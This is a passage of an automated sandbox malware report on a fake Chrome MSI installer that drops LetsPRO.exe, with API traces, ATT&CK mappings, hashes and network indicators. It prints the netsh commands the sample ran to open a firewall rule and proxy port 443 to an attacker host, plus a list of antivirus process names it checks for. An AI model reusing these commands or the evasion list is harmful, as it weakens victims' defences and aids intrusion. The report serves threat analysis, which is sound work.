                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetLocaleInfoW,8_2_0026845C
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: EnumSystemLocalesW,8_2_00261CFD
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00268584
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00267DF0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetLocaleInfoW,8_2_0026868C
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_0026875F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: EnumSystemLocalesW,30_2_6CDEECFD
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,30_2_6CDF68F6
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW,30_2_6CDF69FC
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,30_2_6CDF6ACB
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: EnumSystemLocalesW,30_2_6CDF64EF
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: EnumSystemLocalesW,30_2_6CDF6454
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: EnumSystemLocalesW,30_2_6CDF6409
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,30_2_6CDF657A
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW,30_2_6CDF67CD
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,30_2_6CDF6167
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW,30_2_6CDF6362
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: GetLocaleInfoW,30_2_6CDEF27A
                  Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_025FB63F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_025FB63F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F45D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,4_2_03F45D22
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F36A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,4_2_03F36A70
                  Source: C:\Windows\System32\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: unknown Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                  Source: unknown Process created: C:\Windows\System32\netsh.exe netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443
                  Source: LetsPRO.exe Binary or memory string: acs.exe
                  Source: LetsPRO.exe Binary or memory string: vsserv.exe
                  Source: LetsPRO.exe Binary or memory string: kxetray.exe
                  Source: LetsPRO.exe Binary or memory string: avcenter.exe
                  Source: LetsPRO.exe Binary or memory string: KSafeTray.exe
                  Source: LetsPRO.exe Binary or memory string: cfp.exe
                  Source: LetsPRO.exe Binary or memory string: avp.exe
                  Source: LetsPRO.exe, LetsPRO.exe, 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 360Safe.exe
                  Source: LetsPRO.exe Binary or memory string: rtvscan.exe
                  Source: LetsPRO.exe, LetsPRO.exe, 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 360tray.exe
                  Source: LetsPRO.exe Binary or memory string: ashDisp.exe
                  Source: LetsPRO.exe Binary or memory string: TMBMSRV.exe
                  Source: LetsPRO.exe, LetsPRO.exe, 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 360Tray.exe
                  Source: LetsPRO.exe Binary or memory string: avgwdsvc.exe
                  Source: LetsPRO.exe Binary or memory string: AYAgent.aye
                  Source: LetsPRO.exe Binary or memory string: QUHLPSVC.EXE
                  Source: LetsPRO.exe Binary or memory string: RavMonD.exe
                  Source: LetsPRO.exe Binary or memory string: Mcshield.exe
                  Source: LetsPRO.exe Binary or memory string: K7TSecurity.exe
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 1 Scripting | 1 Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 1 Exploitation for Privilege Escalation | 22 Disable or Modify Tools | 1 Credential API Hooking | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | 1 Replication Through Removable Media | 22 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 121 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 22 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 13 Command and Scripting Interpreter | 1 Valid Accounts | 1 Valid Accounts | 4 Obfuscated Files or Information | Security Account Manager | 11 Peripheral Device Discovery | SMB/Windows Admin Shares | 1 Credential API Hooking | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 24 Windows Service | 11 Access Token Manipulation | 1 Software Packing | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | 121 Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | 13 Service Execution | 1 Scheduled Task/Job | 24 Windows Service | 1 DLL Side-Loading | LSA Secrets | 139 System Information Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 222 Process Injection | 1 File Deletion | Cached Domain Credentials | 361 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Scheduled Task/Job | 232 Masquerading | DCSync | 151 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Valid Accounts | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Modify Registry | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 151 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 11 Access Token Manipulation | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                  Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 222 Process Injection | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
                  Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 1 Indicator Removal | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
                  Behavior Graph ID: 1432094, Sample: sutup-Chrome.13.26.x64.msi, Startdate: 26/04/2024, Architecture: WINDOWS, Score: 100

                  Source | Detection | Scanner | Label | Link
                  sutup-Chrome.13.26.x64.msi | 3% | ReversingLabs | |
                  sutup-Chrome.13.26.x64.msi | 2% | Virustotal | | Browse
                  Source | Detection | Scanner | Label | Link
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe | 100% | Avira | HEUR/AGEN.1362051 |
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe | 100% | Joe Sandbox ML | |
                  C:\Program Files (x86)\ChromeSetup.exe | 0% | ReversingLabs | |
                  C:\Program Files (x86)\ChromeSetup.exe | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe | 17% | Virustotal | | Browse
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dll | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dll | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll | 0% | Virustotal | | Browse
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll | 0% | ReversingLabs | |
                  C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll | 0% | Virustotal | | Browse
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  156.248.54.11.webcamcn.xyz | 156.248.54.11 | true | true | | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  https://dl.google.com/update2/installers/icons/https://m.google.com/devicemanagement/data/apiLastCod | GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://www.google.com/support/installer/? | GoogleUpdate.exe | false | | high
                  https://m.google.com/devicemanagement/data/api | GoogleUpdate.exe | false | | high
                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                          156.248.54.11 | 156.248.54.11.webcamcn.xyz | Seychelles | | 328608 | Africa-on-Cloud-ASZA | true
                          IP
                          127.0.0.1
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1432094
                          Start date and time:2024-04-26 12:52:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 12m 13s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:48
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:sutup-Chrome.13.26.x64.msi
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.evad.winMSI@78/175@1/2
                          EGA Information:
                          • Successful, ratio: 55.6%
                          HCA Information:
                          • Successful, ratio: 87%
                          • Number of executed functions: 66
                          • Number of non-executed functions: 377
                          Cookbook Comments:
                          • Found application associated with file extension: .msi
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded IPs from analysis (whitelisted): 142.250.217.227
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, hm2.webcamcn.xyz, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target LetsPRO.exe, PID 1976 because there are no executed function
                          • Execution Graph export aborted for target LetsPRO.exe, PID 5596 because there are no executed function
                          • Execution Graph export aborted for target LetsPRO.exe, PID 6640 because there are no executed function
                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtEnumerateKey calls found.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          Time | Type | Description
                          12:52:57 | Task Scheduler | Run new task: Update path: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                          12:54:18 | API Interceptor | 71985x Sleep call for process: LetsPRO.exe modified
                          No context
                          No context
                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                          Africa-on-Cloud-ASZA | sora.x86.elf | Get hash | malicious | Mirai | Browse | 156.240.230.2
                          | ccm9HqTuky.elf | Get hash | malicious | Mirai | Browse | 156.246.150.198
                          | jdsfl.arm.elf | Get hash | malicious | Mirai | Browse | 156.228.63.11
                          | SgtB2WW8ys.elf | Get hash | malicious | Mirai | Browse | 45.206.20.168
                          | SocUwyIjOh.elf | Get hash | malicious | Mirai | Browse | 45.206.28.4
                          | 9IseFevRH6.elf | Get hash | malicious | Mirai | Browse | 156.240.33.243
                          | SecuriteInfo.com.FileRepMalware.20155.16240.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 156.228.228.52
                          | bPOGt24Mub.elf | Get hash | malicious | Mirai | Browse | 156.228.38.99
                          | OPs5j7Yjb8.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 156.240.127.187
                          No context
                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                          C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll | VisualCppRedist_AIO_x86_x64.exe | Get hash | malicious | Unknown | Browse |
                          | RDWorksV8Setup8.01.55-20210605.exe | Get hash | malicious | Unknown | Browse |
                          C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe | Chrome-Setup.msi | Get hash | malicious | Unknown | Browse |
                          | oujFMn0mdW.exe | Get hash | malicious | AsyncRAT, Binder HackTool, PureLog Stealer | Browse |
                          C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll | VisualCppRedist_AIO_x86_x64.exe | Get hash | malicious | Unknown | Browse |
                          | RDWorksV8Setup8.01.55-20210605.exe | Get hash | malicious | Unknown | Browse |
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):225012
                                      Entropy (8bit):6.555328951333927
                                      Encrypted:false
                                      SSDEEP:3072:7Q5Lor2Lp9Zjxt8Bd9XF6N5RTNL5tludmMiz84Fak4lNAKIpwCHLDd4CHKECNE36:7OCrUPJ84ilfnCHLDWEIMjq5vR4rnY
                                      MD5:21A609D5D5F03928641D03501F970DC2
                                      SHA1:CB33EA307E7848D5A24995748BCFAC0EDACF7D89
                                      SHA-256:2C5A3A1C83C6AD1C6B1BAE639A892A609272C28E198BC92FE37D366A67803BAB
                                      SHA-512:662E55778ABD87CBC8A0162DC3CE252058F4F1176D76053009F97E52EB676AAC5A8633F258DE6A3E5C46490E3757094BE106392B948BF92775F06D5587BED1D7
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1376816
                                      Entropy (8bit):7.919887049125556
                                      Encrypted:false
                                      SSDEEP:24576:PJvKzcVkyEq9DRho1jFP8ltPP01Ws7+wFPEl9ix4fpUzoQDt+egElxdqFWVCGC:FKzcCyEq9DRho/ctH01Ws74rA4RUBDHo
                                      MD5:8884A9547AA410B697EFAD097F2B0013
                                      SHA1:F3E7B8A25DF24532F48DAE750388E1749169B620
                                      SHA-256:24E46969CEA3B387E899D5DA33820B988A9944100E47ABA3D1960C4080F28B9B
                                      SHA-512:E03EB2EB3F8414B2C9AA9431B63082FB195EA499DC7C1EA9E67E649C81B5C13D922FDA30C5B62CA15A9BCCBC6D7F6EFA4A92EF604216E80EF3EE14D10E38B1C4
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):247272
                                      Entropy (8bit):6.894584449013581
                                      Encrypted:false
                                      SSDEEP:6144:+Zzvhs2Z4n1E7g34XtVYAOfTdxz44JsQwtUnh2:+J+2Z4nShVY5HU3Uh2
                                      MD5:7BB188DFEE179CBDE884A0E7D127B074
                                      SHA1:AF351D674EC8515B4363B279C5EF803F7A4A3618
                                      SHA-256:7C3308F04DF19ECAA36818C4A49348E1D6921A43DF5C53CB8131CC58E92889ED
                                      SHA-512:45DF588D45CAD6BCE5DFB48626D7505140EC1C1BEECB97E3F9393CB90A144CA09C1A4D4DED75FCE18AC3C7DC6F5CA0B222574222BD746D60CB6068EF910A5C4B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9844736
                                      Entropy (8bit):7.99998096243402
                                      Encrypted:true
                                      SSDEEP:196608:qRlibNUmuwBTq1rmORsopQx6KUlel00nSzVnTHY8ouGs6HMfk3dW6Mw:Q2NUmJTq4DMelbSFjY8D6HMfymw
                                      MD5:75D0239E2D42FCB09AD6DD6380E58441
                                      SHA1:D146D55D9E3CAC254414C5D3DCCD56E55C62F229
                                      SHA-256:530A033F92543E1FE9061E5043F0EACBEC5A0DB300B862E8470FCD0C36FE07C1
                                      SHA-512:18FE51D9F9DED140E9A12F1C20C8FA4FA049892C480DCF933A29B15F3E3F063BE410245071DA77CAC34626FCBF60FE067F42D39EB4B03CFFD2FB88413314E695
                                      Malicious:false
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7168
                                      Entropy (8bit):4.658263260341292
                                      Encrypted:false
                                      SSDEEP:96:d6kLgAfFGeOEdsmW2ZL0lpTSupF/ojJnkYY2oS6k9Tvg3uB:ZkA2mBpYpMkd2Ik9Tvgq
                                      MD5:A5FC151170B4BEF53A2918729AA6D3A9
                                      SHA1:5C4AA81EABF2B681D950813EFE91B4959DEF907F
                                      SHA-256:7462F9337A959B4F57B58CB2002016DD1BBDBD6A9B7BA339C933A5B6C1BBC324
                                      SHA-512:48FACE9B188040377787E0FF0E0725FED5CEFEE4AA5CE4B8CA89AF40352FEA559D446941858BB1A3DB6CACF901CBCAE62C8005EE616829974B6A7A9F01B8472B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 17%
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):422040
                                      Entropy (8bit):6.600223717807955
                                      Encrypted:false
                                      SSDEEP:12288:AOb8zxr1aWPaHX7dGP5HrhUgiW6QR7t5qv3Ooc8UHkC2ebe:AOb8Fpa6aHX7dGP5Ov3Ooc8UHkC2ei
                                      MD5:ED40615AA67499E2D2DA8389BA9B331A
                                      SHA1:09780D2C9D75878F7A9BB94599F3DC9386CF3789
                                      SHA-256:CD28DAEDA3C8731030E2077E6ECCBB609E2098919B05FF310BEF8DCE1DCE2D8D
                                      SHA-512:47D94C5F4829A0F901B57084C22B24ADEFB4AEC2F7B8DF9EA838E485DBC607AA837ED6D3C7186159499C44A3FF488FB04F770C624649A406854D82CD3BAF72EE
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: VisualCppRedist_AIO_x86_x64.exe, Detection: malicious
                                      • Filename: RDWorksV8Setup8.01.55-20210605.exe, Detection: malicious
